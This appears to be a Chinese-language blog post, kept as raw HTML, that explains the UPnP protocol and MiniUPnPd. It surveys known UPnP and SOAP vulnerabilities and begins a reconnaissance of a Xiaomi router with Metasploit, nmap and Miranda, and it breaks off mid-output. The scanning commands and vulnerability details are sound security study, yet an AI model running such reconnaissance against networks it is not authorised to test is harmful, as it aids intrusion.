</span><br><span class="line"></span><br><span class="line">            <span class="function"><span class="title">stop</span></span>() &#123;                                                                                                               </span><br><span class="line">                    service_stop /usr/sbin/miniupnpd                                                                               </span><br><span class="line"></span><br><span class="line">                    iptables -t nat -F MINIUPNPD 2&gt;/dev/null                                            </span><br><span class="line">                    iptables -t filter -F MINIUPNPD 2&gt;/dev/null                                         </span><br><span class="line">                    <span class="built_in">return</span> 0                                                                            </span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure><p>SmartController<br>messagingagent</p>]]></content>
+        <content type="html"><![CDATA[<h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p><a href="http://miniupnp.free.fr/" target="_blank" rel="noopener">HomePage</a><br><a href="https://openwrt.org/docs/guide-user/firewall/upnp/miniupnpd" target="_blank" rel="noopener">OpenWRT与miniUPnP</a></p><blockquote><p>MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。<br>在MiniUPnPd中添加了NAT-PMP和PCP支持。 对于客户端（MiniUPnPc）使用libnatpmp来支持NAT-PMP。<br>MiniUPnP守护程序（MiniUPnPd）支持OpenBSD，FreeBSD，NetBSD，DragonFly BSD（Open）Solaris和Mac OS X以及pf或ipfw（ipfirewall）或ipf和Linux with netfilter。 MiniUPnP客户端（MiniUPnPc）和MiniSSDPd是便携式的，可以在任何POSIX系统上运行。 MiniUPnPc也适用于MS Windows和AmigaOS（版本3和4）。</p></blockquote><p><a href="https://2014.ruxcon.org.au/assets/2014/slides/rux-soap_upnp_ruxcon2014.pptx" target="_blank" rel="noopener">https://2014.ruxcon.org.au/assets/2014/slides/rux-soap_upnp_ruxcon2014.pptx</a><br><a href="https://www.akamai.com/us/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf" target="_blank" rel="noopener">https://www.akamai.com/us/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf</a><br><a href="https://www.defcon.org/images/defcon-19/dc-19-presentations/Garcia/DEFCON-19-Garcia-UPnP-Mapping.pdf" target="_blank" rel="noopener">https://www.defcon.org/images/defcon-19/dc-19-presentations/Garcia/DEFCON-19-Garcia-UPnP-Mapping.pdf</a></p><h2 id="UPnP-IGD客户端轻量级库和UPnP-IGD守护进程"><a href="#UPnP-IGD客户端轻量级库和UPnP-IGD守护进程" class="headerlink" title="UPnP IGD客户端轻量级库和UPnP IGD守护进程"></a>UPnP IGD客户端轻量级库和UPnP IGD守护进程</h2><p>大多数家庭adsl /有线路由器和Microsoft Windows 2K/XP都支持UPnP协议。 MiniUPnP项目的目标是提供一个免费的软件解决方案来支持协议的“Internet网关设备”部分。</p><blockquote><p>用于UPnP设备的Linux SDK（libupnp）对我来说似乎太沉重了。 我想要最简单的库，占用空间最小，并且不依赖于其他库，例如XML解析器或HTTP实现。 所有代码都是纯ANSI C.</p></blockquote><p>miniupnp客户端库在x86 PC上编译，代码大小不到50KB。<br>miniUPnP守护程序比任何其他IGD守护程序小得多，因此非常适合在低内存设备上使用。 它也只使用一个进程而没有其他线程，不使用任何system（）或exec（）调用，因此保持系统资源使用率非常低。<br>该项目分为两个主要部分：</p><ul><li>MiniUPnPc，客户端库，使应用程序能够访问网络上存在的UPnP“Internet网关设备”提供的服务。 在UPnP术语中，MiniUPnPc是UPnP控制点。</li><li>MiniUPnPd，一个守护进程，通过作为网关的linux或BSD（甚至Solaris）为您的网络提供这些服务。 遵循UPnP术语，MiniUPnPd是UPnP设备。<br>开发MiniSSDPd与MiniUPnPc，MiniUPnPd和其他协作软件一起工作：1. MiniSSDPd监听网络上的SSDP流量，因此MiniUPnPc或其他UPnP控制点不需要执行发现过程，并且可以更快地设置重定向；   2.  MiniSSDPd还能够代表MiniUPnPd或其他UPnP服务器软件回复M-SEARCH SSDP请求。 这对于在同一台机器上托管多个UPnP服务很有用。<br>守护进程现在也可以使用netfilter用于linux 2.4.x和2.6.x. 可以使它在运行OpenWRT的路由器设备上运行。<br>由于某些原因，直接使用MiniUPnP项目中的代码可能不是一个好的解决方案。<br>由于代码很小且易于理解，因此为您自己的UPnP实现提供灵感是一个很好的基础。 C ++中的<a href="http://ktorrent.org/" target="_blank" rel="noopener">KTorrent</a> UPnP插件就是一个很好的例子。</li></ul><h2 id="MiniUPnP客户端库的实用性"><a href="#MiniUPnP客户端库的实用性" class="headerlink" title="MiniUPnP客户端库的实用性"></a>MiniUPnP客户端库的实用性</h2><p>只要应用程序需要侦听传入的连接，MiniUPnP客户端库的使用就很有用。例如：P2P应用程序，活动模式的FTP客户端，IRC（用于DCC）或IM应用程序，网络游戏，任何服务器软件。</p><ul><li>路由器的UPnP IGD功能的典型用法是使用MSN Messenger的文件传输。 MSN Messenger软件使用Windows XP的UPnP API打开传入连接的端口。 为了模仿MS软件，最好也使用UPnP。</li><li>已经为XChat做了一个补丁，以展示应用程序如何使用miniupnp客户端库。</li><li>传输，一个免费的软件BitTorrent客户端正在使用miniupnpc和libnatpmp。</li></ul><h2 id="MiniUPnP守护进程的实用性"><a href="#MiniUPnP守护进程的实用性" class="headerlink" title="MiniUPnP守护进程的实用性"></a>MiniUPnP守护进程的实用性</h2><p>UPnP和NAT-PMP用于改善NAT路由器后面的设备的互联网连接。 诸如游戏，IM等的任何对等网络应用可受益于支持UPnP和/或NAT-PMP的NAT路由器。最新一代的Microsoft XBOX 360和Sony Playstation 3游戏机使用UPnP命令来启用XBOX Live服务和Playstation Network的在线游戏。 据报道，MiniUPnPd正在与两个控制台正常工作。 它可能需要一个精细的配置调整。</p><h2 id="安全"><a href="#安全" class="headerlink" title="安全"></a>安全</h2><p>UPnP实施可能会受到安全漏洞的影响。 错误执行或配置的UPnP IGD易受攻击。 安全研究员HD Moore做了很好的工作来揭示现有实施中的漏洞：<a href="http://hdm.io/writing/originals/SecurityFlawsUPnP.pdf" target="_blank" rel="noopener">通用即插即用（PDF）中的安全漏洞</a>。 一个常见的问题是让SSDP或HTTP/SOAP端口对互联网开放：它们应该只能从LAN访问。</p><h1 id="协议栈"><a href="#协议栈" class="headerlink" title="协议栈"></a>协议栈</h1><p>工作流程<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830377/paper/111.png" alt></p><p>Linux体系结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830425/paper/112.png" alt></p><h2 id="发现"><a href="#发现" class="headerlink" title="发现"></a>发现</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830465/paper/113.png" alt><br>给定一个IP地址（通过DHCP获得），UPnP网络中的第一步是发现。<br>当一个设备被加入到网络中并想知道网络上可用的UPnP服务时，UPnP检测协议允许该设备向控制点广播自己的服务。通过UDP协议向端口1900上的多播地址239.255.255.250发送发现消息。此消息包含标头，类似于HTTP请求。此协议有时称为HTTPU（HTTP over UDP）：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">M-SEARCH * HTTP / 1.1</span><br><span class="line">主机：239.255.255.250 ：1900</span><br><span class="line">MAN：ssdp：discover</span><br><span class="line">MX：10</span><br><span class="line">ST：ssdp：all</span><br></pre></td></tr></table></figure></p><p>所有其他UPnP设备或程序都需要通过使用UDP单播将类似的消息发送回设备来响应此消息，并宣布设备或程序实现哪些UPnP配置文件。对于每个配置文件，它实现一条消息发送：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HTTP / 1.1 200 OK</span><br><span class="line">CACHE-CONTROL：max-age = 1800</span><br><span class="line">EXT：</span><br><span class="line">LOCATION：http：//10.0.0.138：80 / IGD.xml</span><br><span class="line">SERVER：SpeedTouch 510 4.0.0.9.0 UPnP / 1.0（DG233B00011961）</span><br><span class="line">ST：urn：schemas-upnp-org：service：WANPPPConnection：1</span><br><span class="line">USN：uuid：UPnP-SpeedTouch510 :: urn：schemas-upnp-org：service：WANPPPConnection：1</span><br></pre></td></tr></table></figure></p><p>类似地，当一个控制点加入到网络中的时候，它也能够搜索到网络中存在的、感兴趣的设备相关信息。这两种类型的基础交互是一种仅包含少量、重要相关设备信息或者它的某个服务。比如，类型、标识和指向更详细信息的链接。<br>UPnP检测协议是 <strong><em>基于简单服务发现协议（SSDP）</em></strong> 的。</p><h2 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h2><p>UPnP网络的下一步是描述。当一个控制点检测到一个设备时，它对该设备仍然知之甚少。为了使控制点了解更多关于该设备的信息或者和设备进行交互，控制点必须从设备发出的检测信息中包含的URL获取更多的信息。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830499/paper/114.png" alt><br>某个设备的UPnP描述是 <strong>XML</strong> 的方式,通过http协议，包括品牌、厂商相关信息，如型号名和编号、序列号、厂商名、品牌相关URL等。描述还包括一个嵌入式设备和服务列表，以及控制、事件传递和存在相关的URL。对于每种设备，描述还包括一个命令或动作列表，包括响应何种服务，针对各种动作的参数；这些变量描述出运行时设备的状态信息，并通过它们的数据类型、范围和事件来进行描述。</p><h2 id="控制"><a href="#控制" class="headerlink" title="控制"></a>控制</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830533/paper/1133.png" alt><br>UPnP网络的下一步是控制。当一个控制点获取到设备描述信息之后，它就可以向该设备发送指令了。为了实现此，控制点发送一个合适的控制消息至服务相关控制URL（包含在设备描述中）。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;service&gt;</span><br><span class="line">  &lt;serviceType&gt; urn：schemas-upnp-org：service：WANPPPConnection：1 &lt;/ serviceType&gt;</span><br><span class="line">  &lt;serviceId&gt; urn：upnp-org： serviceId：wanpppc：pppoa &lt;/ serviceId&gt;</span><br><span class="line">  &lt;controlURL&gt; / upnp / control / wanpppcpppoa &lt;/ controlURL&gt;</span><br><span class="line">  &lt;eventSubURL&gt; / upnp / event / wanpppcpppoa &lt;/ eventSubURL&gt;</span><br><span class="line">  &lt;SCPDURL&gt; /WANPPPConnection.xml &lt;/ SCPDURL&gt;</span><br><span class="line">&lt;/ service&gt;</span><br></pre></td></tr></table></figure></p><p>要发送SOAP请求，只需要controlURL标记内的URL。控制消息也是通过 <strong><em>简单对象访问协议（SOAP）</em></strong> 用XML来描述的。类似函数调用，服务通过返回动作相关的值来回应控制消息。动作的效果，如果有的话，会反应在用于刻画运行中服务的相关变量。</p><h2 id="事件通知"><a href="#事件通知" class="headerlink" title="事件通知"></a>事件通知</h2><p>下一步是事件通知。UPnP中的事件 <strong><em>协议基于GENA</em></strong> 。一个UPnP描述包括一组命令列表和刻画运行时状态信息的变量。服务在这些变量改变的时候进行更新，控制点可以进行订阅以获取相关改变。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830573/paper/115.png" alt><br>服务通过发送事件消息来发布更新。事件消息包括一个或多个状态信息变量以及它们的当前数值。这些消息也是采用XML的格式，用通用事件通知体系进行格式化。一个特殊的初始化消息会在控制点第一次订阅的时候发送，它包括服务相关的变量名及值。为了支持多个控制点并存的情形，事件通知被设计成对于所有的控制点都平行通知。因此，所有的订阅者同等地收到所有事件通知。<br>当状态变量更改时，新状态将发送到已订阅该事件的所有程序/设备。程序/设备可以通过eventSubURL来订阅服务的状态变量，该URL可以在LOCATION指向的URL中找到。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;service&gt;</span><br><span class="line">  &lt;serviceType&gt; urn：schemas-upnp-org：service：WANPPPConnection：1 &lt;/ serviceType&gt;</span><br><span class="line">  &lt;serviceId&gt; urn：upnp-org：serviceId：wanpppc：pppoa &lt;/ serviceId&gt;</span><br><span class="line">  &lt;controlURL&gt; / upnp / control / wanpppcpppoa &lt;/ controlURL&gt;</span><br><span class="line">  &lt;eventSubURL&gt; / upnp / event / wanpppcpppoa &lt;</span><br><span class="line">  &lt;SCPDURL&gt; /WANPPPConnection.xml &lt;/ SCPDURL&gt;</span><br><span class="line">&lt;/ service&gt;</span><br></pre></td></tr></table></figure></p><h2 id="展示"><a href="#展示" class="headerlink" title="展示"></a>展示</h2><p>最后一步是展示。如果设备带有存在URL，那么控制点可以通过它来获取设备存在信息，即在浏览器中加载URL，并允许用户来进行相关控制或查看操作。具体支持哪些操作则是由存在页面和设备完成的。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830618/paper/1111.png" alt></p><h2 id="NAT穿透"><a href="#NAT穿透" class="headerlink" title="NAT穿透"></a>NAT穿透</h2><p>UPnP为NAT（网络地址转换）穿透带来了一个解决方案：<strong>互联网网关设备协议（IGD）</strong>。NAT穿透允许UPnP数据包在没有用户交互的情况下，无障碍的通过路由器或者防火墙（假如那个路由器或者防火墙支持NAT）。</p><h1 id="SOAP和UPnP"><a href="#SOAP和UPnP" class="headerlink" title="SOAP和UPnP"></a>SOAP和UPnP</h1><table><thead><tr><th>协议</th><th>全称</th></tr></thead><tbody><tr><td>UPnP</td><td>Universal Plug and Play</td></tr><tr><td>SSDP</td><td>Simple Service Discovery Protocol</td></tr><tr><td>SCPD</td><td>Service Control Protocol Definition</td></tr><tr><td>SOAP</td><td>Simple Object Access Protocol</td></tr></tbody></table><h2 id="UPnP-Discovery"><a href="#UPnP-Discovery" class="headerlink" title="UPnP - Discovery"></a>UPnP - Discovery</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555576753/paper/1.png" alt></p><h2 id="UPnP-–-Description"><a href="#UPnP-–-Description" class="headerlink" title="UPnP – Description"></a>UPnP – Description</h2><ul><li>XML文件通常托管在高位的TCP端口</li><li>版本信息<br>upnp.org spec<br>通常为1.0</li><li>设备定义<br>型号名和编号、序列号、厂商名、品牌相关URL<br>服务列表：服务类型；SCPD URL；Control URL；Event URL<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555576810/paper/2.png" alt><h2 id="UPnP-–-SCPD"><a href="#UPnP-–-SCPD" class="headerlink" title="UPnP – SCPD"></a>UPnP – SCPD</h2></li><li>定义服务动作和参数的XML文件</li><li>版本信息<br>和描述一致</li><li>动作列表<br>动作名<br>参数：参数名、方向（输入输出）、变量名</li><li>变量列表<br>变量名、数据类型<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555577220/paper/3.png" alt><h2 id="UPnP-–-Control"><a href="#UPnP-–-Control" class="headerlink" title="UPnP – Control"></a>UPnP – Control</h2></li><li>这里用到了SOAP</li><li>主要是RPC服务或CGI脚本的前端</li><li>SOAP封装<br>• XML格式的API调用<br>• 描述XML中的服务类型<br>• 来自SCPD XML的动作名称和参数</li><li>POST封装到control URL<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555577719/paper/4.png" alt><h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a>TL;DR</h2><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555577820/paper/5.png" alt><h2 id="好的一面"><a href="#好的一面" class="headerlink" title="好的一面"></a>好的一面</h2></li><li>Control AV equipment</li><li>Home automation</li><li>Network administration</li><li>Physical security systems (ok, easy there buddy)</li><li>Industrial monitoring and control (uh…what?)</li><li>And this is just the official specs<br>All our devices can talk to each other! Brave new worlds of remote control and automation! Have your toaster turn on the lights, set the TV to the news channel, and send you a text message when breakfast is ready! The future is now! Nothing could possibly go wrong!<h2 id="关于安全"><a href="#关于安全" class="headerlink" title="关于安全"></a>关于安全</h2></li></ul><ol><li>嵌入式设备</li></ol><ul><li>有限的内存和处理能力</li><li>硬件和软件开发人员通常是完全不同的公司</li><li>复制和粘贴开发</li><li>保持低成本</li><li>不完全关心/懂行</li></ul><ol start="2"><li>部署</li></ol><ul><li>数以百万计的面向互联网的UPnP设备</li><li>要计算的供应商太多</li><li>前端是标准化的，后端甚至在同一供应商内也有所不同</li><li>难以修补/更新固件</li><li>仅仅因为你可以，并不意味着你应该</li></ul><ol start="3"><li>XML解析很难</li></ol><ul><li>需要大量系统资源</li><li>自由格式的用户提供的数据</li><li>2013年，2.5％的CVE与XML相关[2]，其中，近36％的患者CVSS严重程度为7或以上</li><li>随着XML的用例增长，版本也越来越多：递归错误，XXE，命令注入等……</li></ul><h1 id="攻击面"><a href="#攻击面" class="headerlink" title="攻击面"></a>攻击面</h1><ul><li>UPnP服务<br>• HTTP头解析<br>• SSDP解析<br>• OS命令注入<br>• 信息披露</li><li>SOAP服务<br>• HTTP头解析<br>• XML解析<br>• 注射用品<br>• OS命令<br>• SQL注入<br>• SOAP注入<br>• 信息披露<br>• 可疑级别的未经身份验证的设备控制<h2 id="Attack-surface-–-UPnP"><a href="#Attack-surface-–-UPnP" class="headerlink" title="Attack surface – UPnP"></a>Attack surface – UPnP</h2></li><li><p><a href="https://community.rapid7.com/docs/DOC-2150" target="_blank" rel="noopener">CVE-2012-5958</a><br>去年由HD Moore（众多之一）披露；调用strncpy将ST头中的字符串复制到TempBuf[COMMAND_LEN]；strncpy的长度参数基于冒号之间的字符数<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555580242/paper/6.png" alt></p></li><li><p>D-Link DIR-815 <a href="http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html" target="_blank" rel="noopener">UPnP命令注入</a><br>去年由Zach Cutlip披露;ST头的内容作为参数传递给M-SEARCH.sh;无需验证<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555580904/paper/7.png" alt></p></li></ul><h2 id="Attack-surface-–-SOAP"><a href="#Attack-surface-–-SOAP" class="headerlink" title="Attack surface – SOAP"></a>Attack surface – SOAP</h2><ul><li><p>XBMC soap_action_name<a href="http://www.exploit-db.com/exploits/15347/" target="_blank" rel="noopener">缓冲区溢出</a><br>由n00b于2010年10月公布;ProcessHttpPostRequest函数分配静态大小的缓冲区;调用sscanf将SOAPAction标头的值复制到其中，没有边界检查<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581152/paper/8.png" alt></p></li><li><p>博通SetConnectionType<a href="http://sebug.net/paper/Exploits-Archives/2013-exploits/1301-exploits/DC-2013-01-003.txt" target="_blank" rel="noopener">格式字符串漏洞</a><br>去年Leon Juranic和Vedran Kajic透露；SetConnectionType操作将NewConnectionType参数的值提供给snprintf；不对用户控制的值进行检查<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581385/paper/9.png" alt></p></li><li><p><a href="http://www.pnigos.com/?p=260" target="_blank" rel="noopener">CVE-2014-3242</a><br>今年早些时候由pnig0s披露;SOAPpy允许在SOAP请求中声明用户定义的XML外部实体;不对用户控制的值进行检查<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581672/paper/10.png" alt></p></li><li><p><a href="http://seclists.org/fulldisclosure/2014/May/32" target="_blank" rel="noopener">CVE-2014-2928</a><br>Brandon Perry今年早些时候公布了（PBerry Crunch！）;F5 iControl API set_hostname操作将hostname参数的值传递给shell;再一次，不对用户控制的值进行消毒<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581840/paper/11.png" alt></p></li><li><p><a href="http://toor.do/DEFCON-19-Garcia-UPnP-Mapping-WP.pdf" target="_blank" rel="noopener">CVE-2011-4499，CVE-2011-4500，CVE-2011-4501，CVE-2011-4503，CVE-2011-4504，CVE-2011-4505，CVE-2011-4506，更多？</a><br>Daniel Garcia在Defcon 19上披露; UPnP IGD 使用AddPortMapping和DeletePortMapping等操作来允许远程管理路由规则;缺乏身份验证，可在WAN接口上使用; 使攻击者能够执行：•NAT遍历 •外部/内部主机端口映射 •内部LAN的外部网络扫描</p></li></ul><h2 id="如何测试"><a href="#如何测试" class="headerlink" title="如何测试"></a>如何测试</h2><ul><li>了解您的网络<br>M-SEARCH你连接的每个网络以监听新的NOTIFY消息</li><li>如果您不需要UPnP，请将其禁用<br>如果不在设备上，则在路由器上</li><li>随时掌握固件更新<br>并非总是自动的</li><li>模糊测试<br>Burp – <a href="http://portswigger.net/burp/" target="_blank" rel="noopener">http://portswigger.net/burp/</a><br>WSFuzzer – <a href="https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project" target="_blank" rel="noopener">https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project</a><br>Miranda – <a href="http://code.google.com/p/miranda-upnp/" target="_blank" rel="noopener">http://code.google.com/p/miranda-upnp/</a></li></ul><h1 id="对小米WIFI路由器的UPnP分析"><a href="#对小米WIFI路由器的UPnP分析" class="headerlink" title="对小米WIFI路由器的UPnP分析"></a>对小米WIFI路由器的UPnP分析</h1><h2 id="使用工具扫描"><a href="#使用工具扫描" class="headerlink" title="使用工具扫描"></a>使用工具扫描</h2><h3 id="使用Metasploit检查"><a href="#使用Metasploit检查" class="headerlink" title="使用Metasploit检查"></a>使用Metasploit检查</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">msf5 &gt; use auxiliary/scanner/upnp/ssdp_msearch</span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; set RHOSTS 192.168.31.0/24</span><br><span class="line">RHOSTS =&gt; 192.168.31.0/24</span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Sending UPnP SSDP probes to 192.168.31.0-&gt;192.168.31.255 (256 hosts)</span><br><span class="line">[*] 192.168.31.1:1900 SSDP MiWiFi/x UPnP/1.1 MiniUPnPd/2.0 | http://192.168.31.1:5351/rootDesc.xml | uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8c::upnp:rootdevice</span><br><span class="line">[*] Scanned 256 of 256 hosts (100% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></table></figure><p>从中可以得到这些信息：</p><ul><li>UPnP/1.1</li><li>MiniUPnPd/2.0</li></ul><h3 id="使用nmap进行扫描"><a href="#使用nmap进行扫描" class="headerlink" title="使用nmap进行扫描"></a>使用nmap进行扫描</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">nmap -p1900，5351 192.168.31.1</span><br><span class="line"></span><br><span class="line">PORT     STATE    SERVICE</span><br><span class="line">1900/tcp filtered upnp</span><br><span class="line">5351/tcp open     nat-pmp</span><br></pre></td></tr></table></figure><p><strong><em>nat-pmp</em></strong><br>NAT端口映射协议（英语：NAT Port Mapping Protocol，缩写NAT-PMP）是一个能自动创建网络地址转换（NAT）设置和端口映射配置而无需用户介入的网络协议。该协议能自动测定NAT网关的外部IPv4地址，并为应用程序提供与对等端交流通信的方法。NAT-PMP于2005年由苹果公司推出，为更常见的ISO标准互联网网关设备协议（被许多NAT路由器实现）的一个替代品。该协议由互联网工程任务组（IETF）在RFC 6886中发布。<br>NAT-PMP使用用户数据报协议（UDP），在5351端口运行。该协议没有内置的身份验证机制，因为转发一个端口通常不允许任何活动，也不能用STUN方法实现。NAT-PMP相比STUN的好处是它不需要STUN服务器，并且NAT-PMP映射有一个已知的过期时间，应用可以避免低效地发送保活数据包。<br>NAT-PMP是端口控制协议（PCP）的前身。<br><a href="https://laucyun.com/25118b151a3386b7beff250835fe7e98.html" target="_blank" rel="noopener">https://laucyun.com/25118b151a3386b7beff250835fe7e98.html</a><br>2014年10月，Rapid7安全研究员Jon Hart公布，因厂商对NAT-PMP协议设计不当，估计公网上有1200万台网络设备受到NAT-PMP漏洞的影响。NAT-PMP协议的规范中特别指明，NAT网关不能接受来自外网的地址映射请求，但一些厂商的设计并未遵守此规定。黑客可能对这些设备进行恶意的端口映射，进行流量反弹、代理等攻击。</p><h3 id="netstat扫描"><a href="#netstat扫描" class="headerlink" title="netstat扫描"></a>netstat扫描</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Proto Recv-Q Send-Q Local Address         Foreign Address    State    in out PID/Program name</span><br><span class="line">tcp   0      0      :::5351               :::*               LISTEN   0 0 18068/miniupnpd</span><br><span class="line">udp   0      0      192.168.31.1:5351     0.0.0.0:*          0        0 18068/miniupnpd</span><br><span class="line">udp   0      0      0.0.0.0:1900          0.0.0.0:*          1414113  1827652 18068/miniupnpd</span><br></pre></td></tr></table></figure><p>端口1900在UPnP发现的过程中使用，5351通常为端口映射协议NAT-PMP运行的端口</p><h3 id="miranda"><a href="#miranda" class="headerlink" title="miranda"></a><a href="https://www.ethicalhacker.net/columns/heffner/plug-n-play-network-hacking/" target="_blank" rel="noopener">miranda</a></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 miranda.py -i wlx44334c388fbd -v</span><br><span class="line"></span><br><span class="line">Miranda v1.3</span><br><span class="line">The interactive UPnP client</span><br><span class="line">Craig Heffner, http://www.devttys0.com</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Binding to interface wlx44334c388fbd ...</span><br><span class="line"></span><br><span class="line">Verbose mode enabled!</span><br><span class="line">upnp&gt; msearch</span><br><span class="line"></span><br><span class="line">Entering discovery mode for &apos;upnp:rootdevice&apos;, Ctl+C to stop...</span><br><span class="line"></span><br><span class="line">****************************************************************</span><br><span class="line">SSDP reply message from 192.168.31.1:5351</span><br><span class="line">XML file is located at http://192.168.31.1:5351/rootDesc.xml</span><br><span class="line">Device is running MiWiFi/x UPnP/1.1 MiniUPnPd/2.0</span><br><span class="line">****************************************************************</span><br><span class="line"></span><br><span class="line">upnp&gt; host get 0</span><br><span class="line"></span><br><span class="line">Requesting device and service info for 192.168.31.1:5351 (this could take a few seconds)...</span><br><span class="line"></span><br><span class="line">Device urn:schemas-upnp-org:device:WANDevice:1 does not have a presentationURL</span><br><span 